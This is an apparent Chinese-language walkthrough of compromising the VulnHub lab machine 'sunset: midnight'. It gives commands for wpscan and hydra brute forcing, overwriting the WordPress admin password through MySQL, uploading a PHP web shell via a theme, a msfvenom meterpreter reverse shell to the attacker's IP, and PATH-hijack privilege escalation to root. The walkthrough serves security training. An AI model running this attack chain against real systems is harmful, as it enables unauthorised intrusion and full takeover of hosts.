vulnhub靶机-sunset：midnight

admin

141399
文章

117
评论

2022年6月27日00:42:47评论188 views字数 1960阅读6分32秒阅读模式

目标主机：192.168.12.211

操作机（kali）：192.168.70.128

首先对目标主机进行端口探测，发现存在22、80、3306等端口信息。

vulnhub靶机-sunset：midnight

然后直接访问80端口http://192.168.12.211/，跳转到http://sunset-midnight/域名地址，所以直接对host文件进行了配置后使用域名直接进行访问。

vulnhub靶机-sunset：midnight

发现看见web服务的网站页面以后，发现其实就是一个WordPress的站点。

vulnhub靶机-sunset：midnight

然后我们尝试使用wpscan对当前站点进行扫描：wpscan --url http://sunset-midnight/，在扫描中发现了一些网站网站路径等相关信息

vulnhub靶机-sunset：midnight

查看一下当前服务的一些指纹信息，根据WordPress的版本信息搜索了一下当前版本存在的一些漏洞信息，然而发现检索的漏洞在当前版本中并不可用。

vulnhub靶机-sunset：midnight

我们并同步对WordPress的用户进行枚举扫描：wpscan --url http://sunset-midnight --enumerate u，我们获取到admin用户是存在的

vulnhub靶机-sunset：midnight

然后我们再对获取到的admin用户尝试进行密码爆破攻击：wpscan --url http://sunset-midnight/ -P password.txt -U admin

vulnhub靶机-sunset：midnight

然而我们并没用成功爆破出密码

vulnhub靶机-sunset：midnight

后来直接尝试对数据库进行爆破攻击：hydra 192.168.12.211 mysql -l root -P password.txt

vulnhub靶机-sunset：midnight

成功爆破出了mysql数据库的用户密码：[3306][mysql] host: 192.168.12.211 login: root password: robert

接下来直接使用了kali远程连接数据库进行操作：mysql -u root -p -h sunset-midnight

vulnhub靶机-sunset：midnight

成功连接了数据库后我们直接操作数据库修改当前WordPress中admin用户的密码信息：

show databases; #查看数据库信息

use wordpress; #定位切换数据库

select userpass from wpusers; #查询当前网站用户密码信息

我们看见数据库用户表中其实只有一条用户数据信息，所以我们直接这条数据的密码进行修改

vulnhub靶机-sunset：midnight

我们将覆盖的密码数据是我们自己想要设置的一个密码进行MD5加密：

update wpusers SET userpass="76a2173be6393254e72ffa4d6df1030a" where id=1; #使用passwd进行MD5加密后去修改之前的密码信息

vulnhub靶机-sunset：midnight

可以看到我们的密码直接修改成功，然后我们就使用我们修改后的密码直接登陆WordPress后台进行getshell操作。

vulnhub靶机-sunset：midnight

通过上传主题文件来getshell 首先先去官网下载一个主题压缩包，之后将执行代码和系统命令的源码写入shell.php中，然后将其放入压缩包一起上传

vulnhub靶机-sunset：midnight

之后访问/wp-content/themes/[主题名]/[shell文件名]即可得到一个shell，成功获取了系统权限

vulnhub靶机-sunset：midnight

然后我们尝试进行shell反弹，使用nc监听非常不稳定，根本无法进行shell连接，尝试使用msf生成getshell的木马文件进行反弹shell：

vulnhub靶机-sunset：midnight

所以下面使用msfvenom生成shell.php，msf进行监听获得shell

访问appearance->add new ->upload theme进行上传

msfvenom -p php/meterpreter/reverse_tcpLHOST=192.168.12.128 LPORT=7777 R > getshell.php

vulnhub靶机-sunset：midnight

访问请求shell文件，代码执行后shell获取成功

vulnhub靶机-sunset：midnight

直接进入shell功能，对主机进行信息收集

vulnhub靶机-sunset：midnight

我们通过翻阅了网站的数据库连接文件获取了数据库连接的账号jose和密码

vulnhub靶机-sunset：midnight

然后我们又在系统用户信息中发现存在一个用户与网站数据库连接用户jose相对应

vulnhub靶机-sunset：midnight

然后我们尝试使用数据库连接用户的密码切换到jose用户,直接成功切入。使用 sudo-l查看当前权限，发现jose不能使用sudo。

vulnhub靶机-sunset：midnight

查看SUDI权限的文件：find / -perm -u=s -type f 2>/dev/null

vulnhub靶机-sunset：midnight

由于不能使用sudo命令，所以大多数命令都不能进行提权，但是发现存在一个status命令，并不太常见，执行一下

vulnhub靶机-sunset：midnight

从上面可以看到status使用了service命令，但是为未使用service的绝对路径，所以可以尝试更改$PATH来执行该文件

cd /tmp

echo "/bin/bash" > service

chmod 777 service

echo $PATH

export PATH=/tmp:$PATH #将/tmp添加到环境变量中

status

再次执行之后便成功获得了root权限

vulnhub靶机-sunset：midnight

原文始发于微信公众号（陆吾安全攻防实验室）：vulnhub靶机-sunset：midnight

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

vulnhub靶机-sunset：midnight

CVE-2025-26147：Denodo Scheduler 中经过身份验证的 RCE

Thymeleaf SSTI

【渗透Tips】NextJs的网站渗透技巧

一次金融APP的解密历程

Clash Verge 客户端 1-Click RCE 漏洞与蜜罐利用分析

Parloo-应急响应-畸形的爱

Day15 Tr0ll2 靶场WP

AWS实现自动监控新服务

加密文件管理系统

邮件钓鱼新思路

发表评论

在线咨询

微信